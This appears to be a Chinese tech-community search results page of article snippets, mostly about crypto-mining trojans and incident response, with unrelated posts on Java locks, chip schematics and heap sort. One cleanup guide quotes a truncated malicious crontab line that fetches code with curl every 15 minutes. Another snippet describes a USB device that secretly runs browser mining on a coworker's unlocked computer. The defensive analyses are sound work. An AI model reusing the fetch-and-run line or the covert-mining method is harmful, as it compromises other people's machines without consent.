首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

服务器被挖矿木马攻击该怎么处理

这个挖矿木马我们可以命名为猪猪挖矿,之所以这样起名也是觉得攻击的特征,以及繁衍感染的能力太强,我们称之为猪猪挖矿木马。...关于如何检测以及防护挖矿木马,我们通过这篇文章来给大家讲解一下,希望大家能够日后遇到服务器被挖矿木马攻击的时候可以应急处理,让损失降到最低。...挖矿木马是2018年底开始大批量爆发的,我们对猪猪挖矿进行了详细的跟踪与追查分析,主要是通过thinkphp的网站漏洞进行攻击服务器,然后在服务器里置入木马后门,以及挖矿木马,该木马的特征如下:内置了许多木马后门...再一特征就是木马文件存储的位置很隐蔽,文件名也是以一些系统的名字来隐藏,文件具有可复制,重生的功能,通信采用C与C端的模式,通信加密采用https,挖矿都是在挖以太坊以及比特币。...作为母鸡,随时与其通信,母鸡对其下达攻击命令,进行挖矿而牟利。

3K10
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    服务器被挖矿木马攻击该怎么处理

    这个挖矿木马我们可以命名为猪猪挖矿,之所以这样起名也是觉得攻击的特征,以及繁衍感染的能力太强,我们称之为猪猪挖矿木马。...关于如何检测以及防护挖矿木马,我们通过这篇文章来给大家讲解一下,希望大家能够日后遇到服务器被挖矿木马攻击的时候可以应急处理,让损失降到最低。 ?...挖矿木马是2018年底开始大批量爆发的,我们对猪猪挖矿进行了详细的跟踪与追查分析,主要是通过thinkphp的网站漏洞进行攻击服务器,然后在服务器里置入木马后门,以及挖矿木马,该木马的特征如下:内置了许多木马后门...再一特征就是木马文件存储的位置很隐蔽,文件名也是以一些系统的名字来隐藏,文件具有可复制,重生的功能,通信采用C与C端的模式,通信加密采用https,挖矿都是在挖以太坊以及比特币。 ?...作为母鸡,随时与其通信,母鸡对其下达攻击命令,进行挖矿而牟利。

    4.1K20

    自己制作一USB自动挖矿

    先讲下设备效果: 对面坐着一位同事中午去吃饭没锁屏幕,这时候你想用他的电脑去挖矿, 挖矿,当然不可能跑到他的座位上,关掉360然后下载挖矿软件什么的.......这时候他的电脑CPU已经占用百分之百,,已经开始为你挖矿了..当然他的机器没有中毒,也不会卡顿,什么也不会发现... 设备如下: ?...USB插入digispark,会模拟键盘输入,模拟然后点击开始运行,输入powershell命令,打开浏览器,使用浏览器挖矿......浏览器挖矿: 浏览器挖矿的网站很多,这是其中一: https://crypto-loot.com/ (这个不错,浏览器挖矿不卡顿,不看CPU,察觉不到.)...注册完成后,在自己的网站上添加挖矿脚本, 然后浏览器打开具有这个脚本的链接地址就自动挖矿了.. digispark : 驱动安装与环境设置参考 http://digistump.com/wiki

    2K20

    Golang语言情怀--第92期 区块链技术-SOL币怎么挖矿?SOL币挖矿教程全面介绍

    除了可以直接在交易所购买之外,大家还可以通过挖矿获取SOL币,只不过这项操作比较复杂,新手投资者还不清楚SOL币怎么挖矿?下面C18快讯小编就给大家全面介绍一下SOL币挖矿教程。...SOL币未来行情预测 我们都知道,区块链上的时间戳是完全同步的,所有节点都共同维护这个公共账本,以保证区块链的可信度,但这也会导致效率较慢,比如以太坊生成一区块就需要间隔15分钟。...对于一底层公链来说,就意味着能够支撑更多的应用。那么对于一项目选择公链来说,他们最关心的问题就应该是开发、维护成本以及用户体验。...截止目前,在Solana生态系统上运行的应用项目已有500,而且还在不断增长。...以上内容为大家解答了SOL币怎么挖矿

    2.5K10

    Linux服务器被植入木马挖矿怎么处理解决

    很多客户网站服务器被入侵,被攻击,找到我们SINE安全公司寻求技术支持与帮助,有些网站被篡改,被跳转,首页内容被替换,服务器植入木马后门,服务器卡顿,服务器异常网络连接,有的客户使用的是阿里云服务器,经常被提醒服务器有挖矿程序...首先我们会对当前服务器的IP,以及IP的地址,linux服务器名称,服务器的版本是centos,还是redhat,服务器的当前时间,进行收集并记录到一txt文档里,接下来再执行下一步,对当前服务器的异常网络连接以及异常的系统进程检查...再一要检查的地方是服务器的历史命令,history很多服务器被黑都会留下痕迹,比如SSH登录服务器后,攻击者对服务器进行了操作,执行了那些恶意命令都可以通过history查询的到,有没有使用wget命令下载木马...最重要的是检查服务器的定时任务,前段时间某网站客户中了挖矿病毒,一直占用CPU,查看了定时任务发现每15分钟自动执行下载命令,crontab -l */15 * * * * (curl -fsSL https...以上就是服务器被入侵攻击的检查办法,通过我们SINE安全给出的检查步骤,挨个去检查,就会发现出问题,最重要的是要检查日志,对这些日志要仔细的检查,哪怕一特征都会导致服务器陷入被黑,被攻击的状态,也希望我们的分享能够帮助到更多需要帮助的人

    5.7K30

    15000字、6代码案例、5原理图让你彻底搞懂Synchronized

    案例深入浅出的描述CAS、synchronized Java层面和C++层面的实现、锁升级的原理、源码等大概观看时间17分钟可以带着几个问题去查看本文,如果认真看完,问题都会迎刃而解:1、synchronized是怎么使用的...synchronized Java层面实现synchronized作用在代码块或方法上,用于保证并发环境下的同步机制任何线程遇到synchronized都要先获取到锁才能执行代码块或方法中的操作在Java中每个对象有一对应的...this.compareAndSwapInt(var1, var2, var5, var5 + var4));        return var5;   }CAS只能对一变量进行操作,如果要对多个变量进行操作...,那么只能对外封装一层(将多个变量封装为新对象的字段),再使用原子类中的AtomicReference不知各位同学有没有发现,CAS的流程有bug,就是在读数据与比较数据之间,如果数据从A被改变到B,...失败则膨胀  ObjectSynchronizer::inflate(THREAD, object)->exit (true, THREAD) ;}偏向锁hotspot开发人员测试,在某些场景下,总是同一线程获取锁

    51242

    KT6368A双模蓝牙芯片的封装原理图怎么画 开发资料获取

    一、简介KT6368A的封装怎么原理图怎么画 资料怎么怎么下载呢也有好几个客户问我们这样的问题,实在是太难了但是没办法,客户就是上帝,也只能认真的解答这个疑惑这里对这类型的问题进行统一精细化回复...,高手请直接跳过,打扰了2.1 KT6368A的封装-原理图-怎么画1、首先,请看一下芯片开发资料里面提供的规格书,路径如下:找到规格书,请翻到最后一页,找到芯片尺寸图,照着尺寸画就可以了,您再问用什么画...,那我们就要奔溃了有简单的方法,KT6368A是标准的SOP8封装,什么叫标准,就是只要8pin脚的芯片,基本封装都是一样的,随便哪个设计软件,ad或者pads,都会有现成的sop8封装,直接套用就可以了...,别想那么多,这是世界标准4、至于原理图,不需要画,可以查看资料包里面的硬件设计参考照着这个copy就可以了,但是这个只能protel99se或者ad工具打开,其他工具请自行画,还不会,那就没有办法了2.2

    17740

    为什么你原理图总画不好?17技巧要知道

    不光是代码有可读性的说法,原理图也有。很多时候原理图不仅仅是给自己看的,也会给其它人看,如果可读性差,会带来一系列沟通问题。所以,要养成良好习惯,做个规范的原理图。...此外,一优秀的原理图,还会考虑可测试性、可维修性、BOM表归一化等。 1 分模块 如上图所示,用线把整张原理图划分好区域,和各个区域写上功能说明,如:电源、STM32等。...这里有两上拉电阻,一4.7K,一10K,如果这个阻值影响不大的话,可以把它们都合并为10K。 去耦电容也是雷同的操作,要举一反三。 6 电源和地的符号 如上图所示。...如上图所示,引脚的排列是对称的,也就是无论怎么接,都是没问题的,只是成本会有所增加。 还有一种方法适用于直流电源的接口,一般是门禁系统用的多。...如上图所示,增加一整流桥,不管+13.4V和PGND怎么接,在1、3引脚上都能产生正确的+12V和GND。 当然,这种方法也要考虑成本和功耗等。

    51150

    记一真实的应急响应案例(2)挖矿病毒事件

    打算登录云管平台重置密码,不小心看到安全告警,原来是中了挖矿病毒。 挖矿病毒的侵入性还是蛮大的,一般都会终止掉CPU占用超过20%的进程,以免计算资源不够挖矿,这常常导致正常业务被中断。...而改掉登录密码,一般是为了避免友商(其它挖矿病毒)通过口令爆破进来抢夺计算资源,这常常导致正常运维工作无法开展,也就是本文出现的情况。 重置密码竟然需要重启服务器,看来第一案发现场没了。...事实证明第一案发现场确实没了,这病毒太不抗造了,一重启就一蹶不振。...03、2023-11-30 08:34:25 10分钟后,攻击者执行的挖矿程序于2023-11-30 08:34:25被阿里云盾检测到。...2、有一存疑的点,恶意程序的计划任务是每分钟执行一次,但实际并未生效,即时重启crond也没用,但手动执行计划任务中的命令又可以成功。

    22910

    记一真实的应急响应案例(3)XMR挖矿病毒事件

    使用命令ls -la /usr/.work/发现启动目录下的另一可疑程序/usr/.work/work64,微步沙箱work64分析报告[2] 确认该程序是恶意程序,后续需要备份后删除。...但脚本内容是每分钟拉黑一次1小时内登录失败超过8次的IP地址,对系统无影响。需询问系统管理员判断是否保留。 /tmp/auth.sh:文件落地时间与恶意程序落地时间一致可能是攻击者上传的。...但脚本内容是每分钟拉黑一次1小时内登录失败超过8次的IP地址,对系统无影响。需询问系统管理员判断是否保留。 1.3.2、敏感目录排查 使用命令find /tmp !...03、2024-01-22 11:50:33至39 5秒钟后,攻击者上传的恶意程序均被腾讯云镜主机安全检测到并告警,不知是这个样本太菜,还是腾讯云镜太强,反正上次记一真实的应急响应案例(2)挖矿病毒事件的阿里云盾用了...3 备份后删除/tmp/xmr 挖矿。 同上。 4 备份后删除/tmp/config.json 挖矿程序的配置文件。 同上。

    6710

    【附源码+原理图】看懂智能硬件原理,DIY一简易智能手环!

    看了上面的分析,大家可能会疑惑——仅仅用一加速计怎么能实现记步和睡眠质量检测呢? 其实确实可以!因为加速计可以实时获取自身的X\Y\Z三轴向的加速度。...最后给大家推荐一款比较容易买到的MPU6050,如图8,该模块将核心芯片和外围电路集成到一模块上并留出八引脚,本次使用只需用到上面四即可(具体连接参考图4)。 ?...为了在总线上区分每一设备,每一从设备必须有一唯一的地址。主设备一般不需要地址(一般为微处理器),因为从设备不能发送命令给主设备。 ?...而这里最精妙的地方在于每次取数据的方式:从p_write所指的位置逆时针取40数据(因为有效帧包含的数据长度为20,一次取40保证至少有一有效帧),然后从这40数据中找出有效信息,赋值给公有成员X...大家也不要被这次测试的难度吓倒,因为无数的事实证明备战的强度要比真正的战斗要艰难的多(哈哈,否则怎么会有势如破竹的战绩呢?)。下面让我们看看自己本次备战的成绩如何?

    6K20

    Linux平台的门罗币挖矿木马的查杀与分析

    通过远程到客户机器,发现一进程占据700%多CPU的使用率。通过分析,定性为是一起针对“门罗币”的挖矿木马入侵事件。...要清除该木马需要清除三位置所有的定时任务,要不然该木马还会死灰复燃,重新被启动挖矿。.../xmr-stak-cpu,是一通用的挖矿项目,支持CPU,AMD与NVIDIA GPU,用于挖“门罗币”。...可确定其是基于开源代码xmr-stak 2.4.2编写的一针对门罗币的挖矿木马。 bashd代码分析 该木马用于针对“门罗币”挖矿的组件,x64架构的ELF格式文件。...通过代码相似性分析可确定该程序是基于xmrig 2.5.2开源项目开发的一基于CPU的针对Monero(XMR)的挖矿木马。 ?

    2.5K40

    堆排序,怎么堆法?

    构建堆 第1步: 如上图,最后一非叶子结点是10,发现10比70小,所以70必须上浮,得到的结果为: ?...第2步: 如上图,倒数第二非叶子结点为40,在40,60,80这三数中,80最大,所以80必须上浮,得到的结果如下: ?...第3步: 如上图,倒数第三非叶子结点为20,而20比70小,所以70必须上浮,20下沉后,发现比下面的10还大,所以没有必要沉底,得到的结果为: ?...接下来的工作就是对上面红框中的的7结点进行调整,使之形成新的堆。 很显然,根据之前调整的过程可知,两蓝色框中的结点,已经分别成堆了,所以这次的调整就简单多了,直接瞄准待调整的10即可。...之前已经把8结点调整成堆,那么调整上面红色框中的7结点成堆便不在话下。于是,这7结点中最大的70被调到了堆顶,如下: ? 80是最大的值,放在最后。

    36030
    领券